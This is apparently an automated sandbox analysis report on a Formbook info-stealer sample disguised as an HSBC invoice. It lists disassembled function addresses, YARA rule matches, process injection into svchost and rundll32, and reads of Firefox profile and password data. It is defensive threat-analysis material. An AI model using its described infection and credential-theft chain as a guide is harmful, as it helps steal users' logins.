            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEF0CC2_2_03DEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D470C02_2_03D470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF70E92_2_03DF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFF0E02_2_03DFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFF7B02_2_03DFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF16CC2_2_03DF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D856302_2_03D85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDD5B02_2_03DDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF75712_2_03DF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D314602_2_03D31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFF43F2_2_03DFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB5BF02_2_03DB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7DBF92_2_03D7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5FB802_2_03D5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFFB762_2_03DFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEDAC62_2_03DEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDDAAC2_2_03DDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D85AA02_2_03D85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE1AA32_2_03DE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFFA492_2_03DFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF7A462_2_03DF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB3A6C2_2_03DB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D499502_2_03D49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5B9502_2_03D5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD59102_2_03DD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D438E02_2_03D438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAD8002_2_03DAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D41F922_2_03D41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFFFB12_2_03DFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFFF092_2_03DFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D49EB02_2_03D49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5FDC02_2_03D5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF1D5A2_2_03DF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D43D402_2_03D43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF7D732_2_03DF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFFCF22_2_03DFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB9C322_2_03DB9C32
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_03270F6C10_2_03270F6C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_0326EFEC10_2_0326EFEC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_0328E66C10_2_0328E66C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_032776B710_2_032776B7
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_032776BC10_2_032776BC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_03270D4410_2_03270D44
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeCode function: 10_2_03270D4C10_2_03270D4C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0497E4F611_2_0497E4F6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0497442011_2_04974420
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498244611_2_04982446
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0499059111_2_04990591
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D053511_2_048D0535
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048EC6E011_2_048EC6E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048CC7C011_2_048CC7C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048F475011_2_048F4750
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D077011_2_048D0770
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0496200011_2_04962000
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049901AA11_2_049901AA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049841A211_2_049841A2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049881CC11_2_049881CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C010011_2_048C0100
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0496A11811_2_0496A118
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0495815811_2_04958158
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049502C011_2_049502C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0497027411_2_04970274
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048DE3F011_2_048DE3F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049903E611_2_049903E6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498A35211_2_0498A352
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04970CB511_2_04970CB5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C0CF211_2_048C0CF2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D0C0011_2_048D0C00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048E8DBF11_2_048E8DBF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048CADE011_2_048CADE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0496CD1F11_2_0496CD1F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048DAD0011_2_048DAD00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498CE9311_2_0498CE93
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048E2E9011_2_048E2E90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498EEDB11_2_0498EEDB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498EE2611_2_0498EE26
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D0E5911_2_048D0E59
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0494EFA011_2_0494EFA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C2FC811_2_048C2FC8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048DCFE011_2_048DCFE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04972F3011_2_04972F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04912F2811_2_04912F28
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048F0F3011_2_048F0F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04944F4011_2_04944F40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B68B811_2_048B68B8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048FE8F011_2_048FE8F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D284011_2_048D2840
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048DA84011_2_048DA840
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D29A011_2_048D29A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0499A9A611_2_0499A9A6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048E696211_2_048E6962
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048CEA8011_2_048CEA80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04986BD711_2_04986BD7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498AB4011_2_0498AB40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498F43F11_2_0498F43F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C146011_2_048C1460
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0496D5B011_2_0496D5B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049995C311_2_049995C3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498757111_2_04987571
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049816CC11_2_049816CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0491563011_2_04915630
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498F7B011_2_0498F7B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D70C011_2_048D70C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0497F0CC11_2_0497F0CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049870E911_2_049870E9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498F0E011_2_0498F0E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048DB1B011_2_048DB1B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0499B16B11_2_0499B16B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BF17211_2_048BF172
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0490516C11_2_0490516C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D52A011_2_048D52A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048EB2C011_2_048EB2C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049712ED11_2_049712ED
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0491739A11_2_0491739A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498132D11_2_0498132D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BD34C11_2_048BD34C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498FCF211_2_0498FCF2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04949C3211_2_04949C32
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048EFDC011_2_048EFDC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04981D5A11_2_04981D5A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D3D4011_2_048D3D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04987D7311_2_04987D73
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D9EB011_2_048D9EB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D1F9211_2_048D1F92
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498FFB111_2_0498FFB1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498FF0911_2_0498FF09
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D38E011_2_048D38E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0493D80011_2_0493D800
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048D995011_2_048D9950
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048EB95011_2_048EB950
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04915AA011_2_04915AA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04971AA311_2_04971AA3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0496DAAC11_2_0496DAAC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0497DAC611_2_0497DAC6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498FA4911_2_0498FA49
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04987A4611_2_04987A46
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04943A6C11_2_04943A6C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048EFB8011_2_048EFB80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04945BF011_2_04945BF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0490DBF911_2_0490DBF9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0498FB7611_2_0498FB76
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027C1C8011_2_027C1C80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027DA76011_2_027DA760
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027BCE4011_2_027BCE40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027BCE3811_2_027BCE38
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027BD06011_2_027BD060
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027BB0E011_2_027BB0E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027C37B011_2_027C37B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027C37AB11_2_027C37AB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0474A1E711_2_0474A1E7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0474A27F11_2_0474A27F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0474BF4C11_2_0474BF4C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0474AFB811_2_0474AFB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0474BA9811_2_0474BA98
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0474BBB411_2_0474BBB4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03D87E54 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03D75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03DAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03DBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03D2B970 appears 280 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 048BB970 appears 279 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04917E54 appears 111 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0494F290 appears 105 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04905130 appears 50 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0493EA12 appears 86 times
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: String function: 00EA0D27 appears 70 times
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: String function: 00EA8B40 appears 42 times
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: String function: 00E87F41 appears 35 times
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262426724.0000000003963000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBCscancopy-invoice778483-payment87476MT103.exe
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1260896685.0000000003B0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBCscancopy-invoice778483-payment87476MT103.exe
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@19/11
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEA2D5 GetLastError,FormatMessageW,0_2_00EEA2D5
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00ED8713 AdjustTokenPrivileges,CloseHandle,0_2_00ED8713
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00ED8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00ED8CC3
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EEB59E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EFF121
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E84FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E84FE9
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeFile created: C:\Users\user\AppData\Local\Temp\autDF3B.tmpJump to behavior
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1701657790.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1701657790.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002ACB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeReversingLabs: Detection: 36%
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeVirustotal: Detection: 37%
            Source: unknownProcess created: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"Jump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: ntmarta.dllJump to behavior
